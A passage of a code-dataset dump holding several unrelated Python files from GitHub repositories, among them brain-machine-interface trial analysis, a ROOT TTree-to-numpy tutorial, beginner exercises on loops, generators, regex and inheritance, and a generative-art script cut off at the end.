ck\n\ndef _bin_neural_push(ixs, filename, binsize, start_index_overall, pre_go = 0.):\n # First load neural push\n #neuralpush_fn = os.path.expandvars('$FA_GROM_DATA/jeev_neural_push.pkl')\n \n neuralpush_fn = '/Volumes/TimeMachineBackups/jeev2013/jeev_neural_push_apr2017.pkl'\n try:\n neuralpush = pickle.load(open(neuralpush_fn, 'rb'), **pkl_kw)\n except:\n neuralpush = pickle.load(open('/Users/preeyakhanna/Dropbox/TimeMachineBackups/jeev2013/jeev_neural_push_apr2017.pkl', 'rb'), **pkl_kw)\n \n # Get correct tag\n\n for i, dayfn in enumerate(fk.task_filelist):\n for j, blkfn in enumerate(dayfn):\n for k, fn in enumerate(blkfn):\n if fn == filename:\n tix = [i, j, k]\n \n neuralpush_spec = neuralpush[fk.task_input_type[tix[0]][tix[1]][tix[2]]]\n\n #Convert m to cm:\n neuralpush_spec = 100*neuralpush_spec\n\n #assert binsize == 0.1\n dt_per_bin = 0.005\n n_per_bin = int(binsize/dt_per_bin)\n pre_go_bins = int(pre_go/dt_per_bin)\n\n bin_ck = []\n ck = []\n for i, (ix0, ix1) in enumerate(ixs):\n binedges = np.arange(ix0 - start_index_overall - pre_go_bins, \n ix1+n_per_bin - start_index_overall, n_per_bin)\n X = np.zeros((len(binedges)-1, neuralpush_spec.shape[0]))\n Xub = neuralpush_spec[:, ix0 - pre_go_bins:ix1]\n for b, bn in enumerate(binedges[:-1]):\n ''' Get mean within 100 ms bins'''\n X[b, :] = np.sum(neuralpush_spec[:, bn:binedges[b+1]], 1)\n bin_ck.append(X)\n ck.append(Xub)\n return bin_ck, ck\n\ndef _bin_ad(times, dat, binsize):\n z = np.zeros_like(dat['AD37'])\n pos_vel = np.hstack((dat['AD39'], z, dat['AD40'], dat['AD37'], z, dat['AD38'], z+1.)) # Pos and velocity\n bin_ad = []\n for i, (t0, t1) in enumerate(times):\n binedges = np.arange(t0, t1+binsize, binsize)\n X = np.zeros((len(binedges)-1, pos_vel.shape[1]))\n for i, b in enumerate(binedges[:-1]):\n X[i, :] = np.mean(pos_vel[int(b*1000):int(binedges[i+1]*1000), :], 0)\n bin_ad.append(X)\n return bin_ad\n\ndef get_targ_ix(strobed, go_ix, task):\n if task == 'co':\n targ = strobed[go_ix - 2, 1]\n targ_ix = targ - 64\n assert np.sum(fk.cotrialList[targ_ix] - targ) == 0\n\n elif task == 'obs':\n targ = [strobed[g-4:g-1, 1] for i, g in enumerate(go_ix)]\n targ_ix = []\n for i, tg in enumerate(targ):\n tmp = np.tile(tg[np.newaxis, :], [len(fk.obstrialList), 1])\n ix = np.nonzero(np.sum(np.abs(fk.obstrialList - tmp), 1) == 0)[0]\n if len(ix)==1:\n targ_ix.append(ix[0])\n else:\n targ_ix.append(-1)\n targ_ix = np.array(targ_ix)\n return targ_ix\n\ndef make_strobed(dat, start_index_overall):\n strobed = []\n events = dat['task_events']\n\n for i, e in enumerate(events):\n ### Added 10-3-19 -- only keep if > start_index_overall; \n if i >= start_index_overall:\n if np.any(np.array(e[0].shape) == 0):\n skip = 1\n else:\n for j, ee in enumerate(e[0]):\n strobed.append([i, ee[0]])\n return np.array(strobed)\n\ndef plot_jeev_trials(task = 'obs', targ_only = 3, day_ix = 0, binsize = 0.1):\n input_type = fk.task_filelist\n \n if task == 'co':\n te_num = input_type[day_ix][0][0]\n \n elif task == 'obs':\n te_num = input_type[day_ix][1][0]\n \n bin_spk, targ_i_all, targ_ix, trial_ix_all, decoder_all, cursor_state, unbinned, exclude = get_jeev_trials_from_task_data(te_num,\n include_pos=True, binsize=binsize)\n\n colors = ['maroon', 'orangered', 'goldenrod','olivedrab','teal', 'steelblue', 'midnightblue', 'darkmagenta', 'k', 'brown']\n\n targs = np.unique(targ_ix)\n targs = targs[targs >= 0] # skip -1\n\n if targ_only is not None:\n targs = targs[targs == targ_only]\n\n if task == 'co':\n f, ax = plt.subplots(ncols = len(targs), figsize=(20, 3))\n \n elif task == 'obs':\n f, ax = plt.subplots(ncols = len(targs), nrows = 2, figsize=(20, 6))\n ax[0, 0].set_ylabel('CW')\n ax[1, 0].set_ylabel('CCW')\n \n if len(targs) == 1:\n ax = [ax]\n\n for ti, i in enumerate(targs):\n\n\n ### Get trials with the right target number: \n ix = np.nonzero(targ_ix == i)[0]\n\n ### Now figure out which trial: \n trl_ix = np.unique(trial_ix_all[ix])\n\n ### Plot the target: \n if task == 'co':\n ax[ti].set_xlim([-1.5, 3.0])\n ax[ti].set_ylim([1, 4.5])\n\n ### Targ\n tmp = np.linspace(0, 2*np.pi, 1000)\n tmp_x = .013*np.cos(tmp) + targ_i_all[ix[0], 0]\n tmp_y = .013*np.sin(tmp) + targ_i_all[ix[0], 1]\n\n ### Center\n tmp2_x = .013*np.cos(tmp) + 0.0377292\n tmp2_y = .013*np.sin(tmp) + 0.1383867 \n\n\n if binsize == 0.1:\n ax[ti].plot(tmp_x*20, tmp_y*20, 'k-')\n ax[ti].plot(tmp2_x*20, tmp2_y*20, 'k-')\n centerPos = np.array([0.0377292, 0.1383867])*20\n targetPos = targ_i_all[ix[0], [0, 1]]*20\n \n elif binsize == 0.005:\n ax[ti].plot(tmp_x*1, tmp_y*1, 'k-')\n ax[ti].plot(tmp2_x*1, tmp2_y*1, 'k-') \n centerPos = np.array([0.0377292, 0.1383867])*1 \n targetPos = targ_i_all[ix[0], [0, 1]]*1 \n \n else:\n #tg = targ_i_all[ix[0], :]\n\n ### Subtract obstacle target center; \n #tg = tg - np.array([0., 2.5])\n\n ### Convert cm --> m \n #tg = tg / 100.\n\n ### Add back the other center; \n #tg = tg + np.array([.04, .14])\n for axrow in range(2):\n ax[axrow, ti].set_xlim([-1.5, 3.0])\n ax[axrow, ti].set_ylim([1, 4.5])\n\n #### Test obstacles ####\n x = sio.loadmat('resim_ppf/jeev_obs_positions_from_amy.mat')\n targ_list = fk.obstrialList\n targ_series = targ_list[i, :] - 63\n TC0 = x['targObjects'][:, :, int(targ_series[0])-1]\n TC1 = x['targObjects'][:, :, int(targ_series[1])-1]\n TC2 = x['targObjects'][:, :, int(targ_series[2])-1]\n\n for t in [TC0, TC1, TC2]:\n\n ### Subtract center;\n ### Update 10/6/20 --> this isn't necessary; \n #t_dem = t - np.array([0., 2.5])[:, np.newaxis]\n\n ### Convert from cm --> m \n t_m = t / 100.\n\n ### Add other center; \n centerpos = np.array([ 0.0377292, 0.1383867])\n t_ = t_m + centerpos[:, np.newaxis]\n\n if binsize == 0.005:\n for axrow in range(2):\n ax[axrow, ti].plot(t_[0, :], t_[1, :], 'k-')\n\n elif binsize == 0.1:\n for axrow in range(2):\n ax[axrow, ti].plot(t_[0, :]*20, t_[1, :]*20, 'k-')\n \n #### Get cneterpos; \n centerPos = np.mean(TC0, axis=1)/100. + centerpos\n targetPos = np.mean(TC2, axis=1)/100. + centerpos\n \n if binsize == 0.1:\n centerPos = centerPos*20\n targetPos = targetPos*20\n\n ######### Plot each trial; ############\n for trl in trl_ix:\n\n ### This a CW or CCW trial ?\n if task == 'obs':\n \n if i in [1, 3, 4, 5, 8, 9]: \n axros = analysis_config.jeev_cw_ccw_dict[i]\n elif day_ix == 3 and i == 2:\n axrow, s = CW_CCW_obs(centerPos, targetPos, cursor_state[trl][:, [0, 2]].T)\n if s < 0.1: \n axrow = 1\n else:\n axrow, _ = CW_CCW_obs(centerPos, targetPos, cursor_state[trl][:, [0, 2]].T)\n \n ax[axrow, ti].plot(cursor_state[trl][:, 0], cursor_state[trl][:, 2], '-', color = colors[i], linewidth=1.0)\n ax[axrow, ti].plot(cursor_state[trl][0, 0], cursor_state[trl][0, 2], 'r.')\n ax[axrow, ti].set_title(\"Targ %d\" %(i))\n else:\n ax[ti].plot(cursor_state[trl][:, 0], cursor_state[trl][:, 2], '-', color = colors[i], linewidth=1.0)\n ax[ti].plot(cursor_state[trl][0, 0], cursor_state[trl][0, 2], 'r.')\n ax[ti].set_title(\"Targ %d\" %(i))\n f.tight_layout()\n\ndef plot_percent_correct_t2t(plot=True, min_obs_targ = 2): \n input_type = fk.task_filelist\n \n metrics = dict()\n metrics['co_pc'] = []\n metrics['obs_pc'] = []\n\n metrics['co_tt'] = []\n metrics['co_tt_mn'] = []\n\n metrics['obs_tt'] = []\n metrics['obs_tt_mn'] = [] \n\n metrics['perc_fulfill_obs'] = []\n metrics['perc_fulfill_obs_mn'] = []\n \n \n tsk_keys = ['co', 'obs']\n\n f, ax = plt.subplots(figsize = (3, 4))\n f2, ax2 = plt.subplots(figsize = (3, 4))\n f3, ax3 = plt.subplots(figsize = (3, 4))\n\n for i_d, day in enumerate(input_type):\n day_perc_fulfill = []; \n\n for i_tsk, tsk in enumerate(day):\n for i_te, filename in enumerate(tsk):\n\n tsk_key = tsk_keys[i_tsk]\n\n ####### Get percent correct #############\n if 'jeev082413_VFB_PPF_B100_NS5_NU20_Z1_assist_ofc_cont_cont_assist_ofc_fixData' in filename:\n start_index_overall = 55003\n else:\n start_index_overall = 0\n\n ####### Load the correct file #######\n filelist_task = []\n for i, j in enumerate(fk.task_filelist):\n for k, l in enumerate(j):\n filelist_task.extend(l)\n try:\n dat = sio.loadmat(filename)\n except:\n ix = [j for i, j in enumerate(filelist_task) if filename in j]\n assert(len(ix)==1)\n \n try:\n dat = sio.loadmat(fk.task_directory+ix[0])\n except:\n dat = sio.loadmat(fk.task_directory_mbp+ix[0])\n \n ###### Get strobed #########\n strobed = make_strobed(dat, start_index_overall)\n cursor_kin = dat['cursor_kin']\n\n go_ix = np.nonzero(strobed[:, 1] == 5)[0]\n print(('1. Total Go Ix: %d' %(len(go_ix))))\n\n ###### Successfully get out of the center #####\n keep_ix = np.nonzero(strobed[go_ix+1, 1] == 6)[0]\n go_ix = go_ix[keep_ix]\n go_ix = go_ix[go_ix < len(strobed) - 3]\n print(('2. Go Ix, out of center: %d' %(len(go_ix))))\n \n ##### Remove targets 0, 1 for obstacle; \n ### Get target index: \n targ_ix = get_targ_ix(strobed, go_ix, tsk_key)\n\n if tsk_key == 'obs':\n keep_ix = np.nonzero(targ_ix >= min_obs_targ)[0]\n else:\n keep_ix = np.arange(len(targ_ix))\n\n go_ix = go_ix[keep_ix]\n print(('3. Go Ix, rm targs obs only: %d' %(len(go_ix))))\n \n ##### Obstacle collision = 300 ########\n obs_coll_ix = np.nonzero(strobed[go_ix+2, 1] == 300)[0]\n\n ##### Target timeout = 12 ##########\n timeout_ix = np.nonzero(strobed[go_ix+2, 1] == 12)[0]\n\n ###### Target hold error = 8 #######\n the_ix = np.nonzero(strobed[go_ix + 3, 1] == 8)[0]\n\n ##### Rew Ix \n rew_ix = np.nonzero(strobed[go_ix + 3, 1] == 9)[0]\n\n #### Are all trials accounted for ####? \n ### Make sure no overlap \n assert len(np.unique(np.hstack((rew_ix, the_ix, timeout_ix, obs_coll_ix)))) == len(np.hstack((rew_ix, the_ix, timeout_ix, obs_coll_ix)))\n \n ### Make sure all trials accounted for ###\n if len(np.unique(np.hstack((rew_ix, the_ix, timeout_ix, obs_coll_ix)))) == len(go_ix):\n N_trls = len(go_ix)\n else:\n ### These notes for for go_ix with all obs targets; May be different if ignore obs target 0, 1; \n ### this happened once in day 0 --> 5, 6, 15, 4, go_ix[205]\n ### with 25 sec in between 6 --> 15 \n ### Maybe kinarm task restarted? \n\n ### happened once day 1 --> go_ix[185], seems like skipped 9? \n\n ### Day 2 --> [5, 6, 9] at go_ix[132], seems like skipped 7; \n print(('Day %d, Task %d, Discrepancy %d' %(i_d, i_tsk, len(go_ix) - len(np.hstack((rew_ix, the_ix, timeout_ix, obs_coll_ix))))))\n N_trls = len(np.unique(np.hstack((rew_ix, the_ix, timeout_ix, obs_coll_ix))))\n \n #### Add percent correct \n metrics[tsk_key + '_pc'].append(float(len(rew_ix)) / float(N_trls))\n\n #### Trial time #####\n trl_time = strobed[go_ix[rew_ix] + 3, 0] - strobed[go_ix[rew_ix], 0]\n metrics[tsk_key + '_tt'].append(trl_time*.005)\n metrics[tsk_key + '_tt_mn'].append(np.mean(trl_time*.005))\n\n ##### For each rewarded trial, get the 3 targets: \n if i_tsk == 0: \n\n for i_trl, trl_go in enumerate(go_ix[rew_ix]): \n targ_ = strobed[trl_go - 2, 1]\n go_ = strobed[trl_go, 0]\n rew_ = strobed[trl_go + 3, 0]\n\n ### Get cursor trajectories ###\n trl_cursor = cursor_kin[[0, 1], go_:rew_] - fk.centerPos[:, np.newaxis]\n\n ### Which target are we in ####\n targ_ix = np.nonzero(fk.cotrialList == targ_)[0]\n tp = fk.targetPos[targ_ix, :] - fk.centerPos; \n tp_norm = tp / np.linalg.norm(tp)\n\n ### Rotate the cursor #### \n angle = np.arctan2(tp_norm[0, 1], tp_norm[0, 0])\n Rot = np.array([[np.cos(-1*angle), -np.sin(-1*angle)], [np.sin(-1*angle), np.cos(-1*angle)]])\n \n ### Does the path go through any of the obstacle targets? How many? \n trl_cursor_rot = np.dot(Rot, trl_cursor)\n perc_obs_viol = test_perc_obs_viol(trl_cursor_rot, min_obs_targ, plot=plot)\n \n metrics['perc_fulfill_obs'].append(1. - perc_obs_viol)\n day_perc_fulfill.append(1. - perc_obs_viol)\n\n if plot:\n import pdb; pdb.set_trace()\n\n day_perc_fulfill = np.hstack((day_perc_fulfill))\n metrics['perc_fulfill_obs_mn'].append(np.mean(day_perc_fulfill))\n\n ##### plot these guys #####\n ########### PERCENT CORRECT ##############\n util_fcns.draw_plot(0, np.hstack((metrics['co_pc'])), 'g', [1., 1., 1., 0.], ax, width = .5)\n util_fcns.draw_plot(1, np.hstack((metrics['obs_pc'])),'b', [1., 1., 1., 0.], ax, width = .5)\n print(('mean perc correct CO %.2f, OBS %.2f' %(np.mean(np.hstack((metrics['co_pc']))), \n np.mean(np.hstack((metrics['obs_pc']))))))\n\n for _, (c, o) in enumerate(zip(metrics['co_pc'], metrics['obs_pc'])):\n ax.plot([0, 1], [c, o], '-', color='gray', linewidth=0.5)\n ax.set_xlim([-0.8, 1.8])\n ax.set_ylim([0., 1.])\n ax.set_ylabel('Percent Correct')\n ax.set_xticks([0, 1])\n ax.set_xticklabels(['CO', 'OBS'], rotation=45)\n\n ########### Target TIME ##############\n util_fcns.draw_plot(0, np.hstack((metrics['co_tt'])), 'k', [1., 1., 1., 0.], ax2, width = .5)\n util_fcns.draw_plot(1, np.hstack((metrics['obs_tt'])),'k', [1., 1., 1., 0.], ax2, width = .5)\n for _, (c, o) in enumerate(zip(metrics['co_tt_mn'], metrics['obs_tt_mn'])):\n ax2.plot([0, 1], [c, o], '-', color='gray', linewidth=0.5)\n ax2.set_xlim([-0.8, 1.8])\n ax2.set_ylim([0., 7.5])\n ax2.set_ylabel('Time to Target (sec)')\n ax2.set_xticks([0, 1])\n ax2.set_xticklabels(['CO', 'OBS'], rotation=45)\n f2.tight_layout()\n util_fcns.savefig(f2, 't2t_jeev')\n\n ########### Target TIME ##############\n util_fcns.draw_plot(0, np.hstack((metrics['perc_fulfill_obs'])), 'g', [1., 1., 1., 0.], ax3, width = .5)\n for _, o in enumerate(metrics['perc_fulfill_obs_mn']):\n ax3.plot(0, o, '.', color='gray')\n ax3.set_xlim([-0.8, 0.8])\n ax3.set_ylim([0., 1.0])\n ax3.set_ylabel('% Fulfill Obs.')\n ax3.set_xticks([0])\n ax3.set_xticklabels(['CO'], rotation=45)\n\ndef test_perc_obs_viol(trl_curs, min_obs_targ, plot=False): \n\n ### Rotate and stretch all the targets to line up to \n x = sio.loadmat('resim_ppf/jeev_obs_positions_from_amy.mat')\n targ_list = fk.obstrialList\n targ_list = targ_list[min_obs_targ:, :]\n rad = 0.065\n\n if plot:\n f, ax = plt.subplots()\n ax.plot(trl_curs[0, :], trl_curs[1, :], 'k-')\n ax.plot(trl_curs[0, 0], trl_curs[1, 0], 'r.')\n\n violate = np.zeros((targ_list.shape[0]))\n\n for i in range(targ_list.shape[0]):\n targ_series = targ_list[i, :] - 63\n TC0 = np.mean(x['targObjects'][:, :, int(targ_series[0])-1], axis=1)\n TC2 = np.mean(x['targObjects'][:, :, int(targ_series[2])-1], axis=1) - TC0\n \n ### Center by TC0\n ### Rotate by TC2; \n ### What is the angle with respect to center point; \n TC2_norm = TC2 / np.linalg.norm(TC2)\n angle = np.arctan2(TC2_norm[1], TC2_norm[0])\n R = np.array([[np.cos(-1*angle), -np.sin(-1*angle)], [np.sin(-1*angle), np.cos(-1*angle)]])\n \n ### Scaling on x-axis ###\n TC2_rot = np.dot(R, TC2[:, np.newaxis])\n scale_all = rad/TC2_rot[0]\n \n ### Now get the obstacle target; \n targ = targ_series[1]\n TC1 = x['targObjects'][:, :, int(targ)-1] # 2 x 100 \n T_dem = TC1-TC0[:, np.newaxis]\n T_rot = np.dot(R, T_dem)\n T_rot_scale = T_rot*scale_all; \n\n if plot: \n #### Plot obstacle ###\n ax.plot(T_rot_scale[0, :], T_rot_scale[1, :], 'b-')\n\n ### Does the cursor pass through this?\n xrad = 0.5*(np.max(T_rot_scale[0, :]) - np.min(T_rot_scale[0, :]))\n yrad = 0.5*(np.max(T_rot_scale[1, :]) - np.min(T_rot_scale[1, :]))\n\n ### Get the center point; \n xmn = np.mean(T_rot_scale[0, :])\n ymn = np.mean(T_rot_scale[1, :])\n\n val = ((trl_curs[0, :] - xmn)**2 / (xrad**2)) + ((trl_curs[1, :] - ymn)**2 / (yrad**2))\n if np.any(val <= 1): \n ix = np.nonzero(val <= 1)[0]\n violate[i] = 1; \n\n if plot: \n ax.plot(trl_curs[0, ix], trl_curs[1, ix], 'm.')\n\n return np.sum(violate) / float(len(violate))\n\ndef CW_CCW_obs(centerPos, targPos, trialPos, plot=False):\n \"\"\"\n Return 0: if CW to get to target, return 1 if CCW to get to target; \n Steps: \n 1. Center by the centerPos\n 2. Rotate by targPos angle such that aligned with (0, 1) axis; \n 3. Compute integral unneath curve; \n\n Args:\n centerPos (np.array): (x, y) of centerPos (or start target for Jeev)\n targPos (np.array): (x, y) of targetPos (or end target for Jeev)\n trialPos (np.array): (2 x T) of trial trajectory (position)\n \n Returns:\n integer: 0 for CW, 1 for CCW\n \"\"\"\n\n targCentered = targPos - centerPos\n targCentered_norm = targCentered / np.linalg.norm(targCentered)\n\n assert(trialPos.shape[0] == len(centerPos) == 2)\n trialCentered = trialPos - centerPos[:, np.newaxis]\n\n ### Rotate Target / trial; \n angle = np.arctan2(targCentered_norm[1], targCentered_norm[0])\n\n ### Rotate by negative of angle: \n Rot = np.array([[np.cos(-1*angle), -np.sin(-1*angle)], [np.sin(-1*angle), np.cos(-1*angle)]])\n\n ### Apply this rotation to the trial: \n trialCentRot = np.dot(Rot, trialCentered)\n\n ### Get step size; \n dx = np.hstack(([0], np.diff(trialCentRot[0, :])))\n\n ### Get the height: \n y = trialCentRot[1, :]\n\n assert(len(dx) == len(y))\n\n if np.dot(dx, y) > 0:\n rot = 'CW'\n return 0, np.dot(dx, y)\n\n elif np.dot(dx, y) < 0:\n rot = 'CCW'\n return 1, np.dot(dx, y)\n\n elif np.dot(dx, y) == 0:\n raise Exception('Perfect Straight Line?')\n\n if plot:\n plot_CW_CCW(trialPos, trialCentRot, rot)\n \ndef plot_CW_CCW(trialPos, trialCentRot, rot):\n f, ax = plt.subplots(ncols = 2)\n ax[0].plot(trialPos[0, :], trialPos[1, :])\n ax[1].plot(trialCentRot[0, :], trialCentRot[1, :])\n ax[1].set_title('Rot %s'%(rot))\n\n\n\n\n","repo_name":"pkhanna104/bmi_dynamics_code","sub_path":"resim_ppf/ppf_pa.py","file_name":"ppf_pa.py","file_ext":"py","file_size_in_byte":30446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22527537762","text":"from .frog_world import FrogWorld\nfrom .wizard_world import WizardWorld\nfrom .game_environment import GameEnvironment\n\n\ndef validate_age(name):\n try:\n age = input(f'Welcome {name}. How old are you?')\n age = int(age)\n except ValueError as err:\n print(f'Age {age} is invalid, please try again...')\n return (False, age)\n return (True, age)\n\n\ndef main():\n name = input('Hello. What\\'s your name?')\n valid_input = False\n while not valid_input:\n valid_input, age = validate_age(name)\n game = FrogWorld if age < 18 else WizardWorld\n environment = GameEnvironment(game(name))\n environment.play()\n","repo_name":"teddyondieki/mastering_python","sub_path":"abstract_method/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7717974102","text":"'''\r\nWrite a Python program where a string will start with a specific number. \r\n'''\r\nimport re\r\n\r\nstr = input(\"Enter a str : \")\r\n\r\n# string should start with a number\r\nx = re.search('^[0-9]+', str)\r\n\r\nif x:\r\n print(\"Matching....\")\r\nelse:\r\n print(\"Not Matching\")","repo_name":"alexandercooper97/300-Python-Exercises","sub_path":"03_Complex/Problem_245/p245.py","file_name":"p245.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30758550398","text":"def simpleGeneratorFun():\n yield 1\n yield 2\n yield 3\n\n\n# Driver code to check above generator function\nfor value in simpleGeneratorFun():\n print(value)\n\n\n# A generator function\ndef simpleGeneratorFun():\n yield 4\n yield 5\n yield 6\n\n\n# x is a generator object\nx = simpleGeneratorFun()\n\n# Iterating over the generator object using next\nwhile(x):\n try:\n print(x.__next__())\n except:\n #print(\"Exception \")\n break;","repo_name":"sethpal/PythonConceptsLearning","sub_path":"oops/generators/Generators.py","file_name":"Generators.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13187873906","text":"## \\file\n## \\ingroup tutorial_pyroot\n## \\notebook -nodraw\n## This tutorial shows how a TTree can be quickly converted to a numpy array or\n## a pandas.DataFrame.\n##\n## \\macro_code\n## \\macro_output\n##\n## \\date April 2018\n## \\author Stefan Wunsch\n\nimport ROOT\nfrom sys import exit\n\ntry:\n import numpy as np\nexcept:\n print(\"Failed to import numpy.\")\n exit()\n\n\n# Helper function to create an example tree\ndef make_example():\n root_file = ROOT.TFile(\"pyroot002_example.root\", \"RECREATE\")\n tree = ROOT.TTree(\"tree\", \"tutorial\")\n x = np.empty((1), dtype=\"float32\")\n y = np.empty((1), dtype=\"float32\")\n tree.Branch(\"x\", x, \"x/F\")\n tree.Branch(\"y\", y, \"y/F\")\n\n for i in range(4):\n x[0] = i\n y[0] = -i\n tree.Fill()\n root_file.Write()\n\n return (root_file, x, y), tree\n\n\n# The conversion of the TTree to a numpy array is implemented with multi-\n# thread support.\nROOT.ROOT.EnableImplicitMT()\n\n# Create a ROOT file with a tree and the branches \"x\" and \"y\"\n_, tree = make_example()\n\n# Print content of the tree by looping explicitly\nprint(\"Tree content:\\n{}\\n\".format(\n np.asarray([[tree.x, tree.y] for event in tree])))\n\n# Read-out full tree as numpy array\narray = tree.AsMatrix()\nprint(\"Tree converted to a numpy array:\\n{}\\n\".format(array))\n\n# Get numpy array and according labels of the columns\narray, labels = tree.AsMatrix(return_labels=True)\nprint(\"Return numpy array and labels:\\n{}\\n{}\\n\".format(labels, array))\n\n# Apply numpy methods on the data\nprint(\"Mean of the columns retrieved with a numpy method: {}\\n\".format(\n np.mean(array, axis=0)))\n\n# Read only specific branches\narray = tree.AsMatrix(columns=[\"x\"])\nprint(\"Only the content of the branch 'x':\\n{}\\n\".format(np.squeeze(array)))\n\narray = tree.AsMatrix(exclude=[\"x\"])\nprint(\"Read all branches except 'x':\\n{}\\n\".format(np.squeeze(array)))\n\n# Get an array with a specific data-type\narray = tree.AsMatrix(dtype=\"int\")\nprint(\"Return numpy array with data-type 'int':\\n{}\\n\".format(array))\n\n## Convert the tree to a pandas.DataFrame\ntry:\n import pandas\nexcept:\n print(\"Failed to import pandas.\")\n exit()\n\ndata, columns = tree.AsMatrix(return_labels=True)\ndf = pandas.DataFrame(data=data, columns=columns)\nprint(\"Tree converted to a pandas.DataFrame:\\n{}\".format(df))\n","repo_name":"maartenb/cern-root","sub_path":"tutorials/pyroot/pyroot002_TTreeAsMatrix.py","file_name":"pyroot002_TTreeAsMatrix.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"34844238161","text":"\n'''\n\"Enquanto\"\n-> estrutura de repetição com teste lógico \n-> sabendo o limite, usa for ou while\n-> não sabendo o limite, usa while \n'''\n\nfor a in range(1, 10):\n print(a)\nprint('FIM')\n\nprint('-----'*10)\n\nb = 1\nwhile b < 10:\n print(b)\n b += 1\nprint('FIM')\n\nprint('-----'*10)\n\nfor c in range(1, 5): #tem limite\n d = int(input('Digite um valor: '))\nprint('FIM')\n\nprint('-----'*10)\n\nwhile e != 0: #não tem limite, o programa para quando digitar 0 | flag / ponto de parada / condição de parada\n e = int(input('Digite um número: '))\nprint('FIM')\n\nprint('-----'*10)\n\nf = 'S'\nwhile f == 'S': #O programa para quando digitar \"N\"\n g = int(input('Digite um valor: '))\n f = str(input('Quer cntinuar? [S/N] ')).upper()\nprint('FIM')\n\nprint('-----'*10)\n\nh = 1\npar = impar = 0\nwhile h != 0:\n h = int(input('Digite um número: '))\n if h != 0:\n if h % 2 == 0:\n par += 1 \n else:\n impar += 1 \nprint(f'Você digitou {par} números pares e {impar} números ímpares!')\n\n","repo_name":"Piresle/Python","sub_path":"Aulas/10_Estrutura_de_Repetição_While.py","file_name":"10_Estrutura_de_Repetição_While.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19493895813","text":"#继承\nclass Animal(object):\n\tdef run(self):\n\t\tprint(\"Animal is running....\")\n\n\nclass Cat(Animal):\n\tdef run(self):\n\t\tprint(\"Cat is running....\")\n\n\nclass Dog(Animal):\n\tdef run(self):\n\t\tprint(\"Dog is running....\")\n\n\nclass Timer(object):\n\tdef run(self):\n\t\tprint(\"Timer is running....\")\n\n\nclass Tortoise(Animal):\n\t\tdef run(self):\n\t\t\tprint(\"Tortoise is running slowly....\")\n\n\ndef run_twice(animal):\n\tanimal.run()\n\tanimal.run()\n\n\nif __name__ == '__main__':\n\ta = Animal()\n\ta.run()\n\tprint(\"isinstance(a,object)\",isinstance(a, object))\n\tb = Cat()\n\tprint(\"isinstance(b,Animal)\",isinstance(b, Animal))\n\tb.run()\n\tc = Dog()\n\tc.run()\n\td=Timer()\n\n\trun_twice(a)\n\trun_twice(b)\n\trun_twice(c)\n\n\t#动态语言的“鸭子类型”,它并不要求严格的继承体系,一个对象只要“看起来像鸭子,走起路来像鸭子”,那它就可以被看做是鸭子。\n\t#这里只要d对象有run方法就可以传入参数\n\trun_twice(d)\n\n\trun_twice(Tortoise())\n\n\t\t\n\t\n\t\n\t\n\t\n\t\n\t\n\n","repo_name":"7colorlotus/pythonLearn","sub_path":"oop/Extend.py","file_name":"Extend.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41909254247","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom numpy import pi, cos, sin, linspace, zeros\nfrom numpy.random import random\nfrom modules.growth import spawn, spawn_curl\n\nNMAX = 10**7\nSIZE = 10000\nONE = 1./SIZE\n\nSTP = ONE*0.02\nNEARL = 15*ONE\nFARL = 0.235\n\nPROCS = 6\n\nMID = 0.5\n\nLINEWIDTH = 5.*ONE\n\nINIT_NUM = 7\n\nBACK = [1,1,1,1]\nFRONT = [0,0,0,0.08]\n\nTWOPI = pi*2.\n\n\ndef main():\n\n from time import time\n from itertools import count\n\n from differentialLine import DifferentialLine\n\n from iutils.render import Render\n from modules.helpers import print_stats\n\n from modules.show import sandstroke\n from modules.show import show\n from modules.show import dots\n\n\n np_coords = zeros(shape=(NMAX,4), dtype='float')\n np_vert_coords = zeros(shape=(NMAX,2), dtype='float')\n\n\n DF = DifferentialLine(NMAX, FARL*2, NEARL, FARL, PROCS)\n\n render = Render(SIZE, BACK, FRONT)\n\n render.ctx.set_source_rgba(*FRONT)\n render.ctx.set_line_width(LINEWIDTH)\n\n # angles = sorted(random(INIT_NUM)*TWOPI)\n # DF.init_circle_segment(MID,MID,0.2, angles)\n\n ## arc\n\n angles = sorted(random(INIT_NUM)*pi*1.5)\n xys = []\n for a in angles:\n x = 0.5 + cos(a)*0.2\n y = 0.5 + sin(a)*0.2\n xys.append((x,y))\n\n DF.init_line_segment(xys, lock_edges=1)\n\n ## vertical line\n\n #yy = sorted(MID + 0.2*(1-2*random(INIT_NUM)))\n #xx = MID+0.005*(0.5-random(INIT_NUM))\n #xys = []\n #for x,y in zip(xx,yy):\n #xys.append((x,y))\n\n #DF.init_line_segment(xys, lock_edges=1)\n\n ## diagonal line\n\n # yy = sorted(MID + 0.2*(1-2*random(INIT_NUM)))\n # xx = sorted(MID + 0.2*(1-2*random(INIT_NUM)))\n # xys = []\n # for x,y in zip(xx,yy):\n # xys.append((x,y))\n\n # DF.init_line_segment(xys, lock_edges=1)\n\n\n for i in count():\n\n t_start = time()\n\n DF.optimize_position(STP)\n spawn_curl(DF,NEARL,0.016)\n\n if i%100==0:\n fn = './res/chris_bd_{:04d}.png'.format(i)\n else:\n fn = None\n\n render.set_front(FRONT)\n num = DF.np_get_edges_coordinates(np_coords)\n sandstroke(render,np_coords[:num,:],20,fn)\n\n\n if random()<0.05:\n sandstroke(render,np_coords[:num,:],30,None)\n\n vert_num = DF.np_get_vert_coordinates(np_vert_coords)\n dots(render,np_vert_coords[:vert_num,:],None)\n\n\n t_stop = time()\n\n print_stats(i,t_stop-t_start,DF)\n\n\nif __name__ == '__main__':\n\n 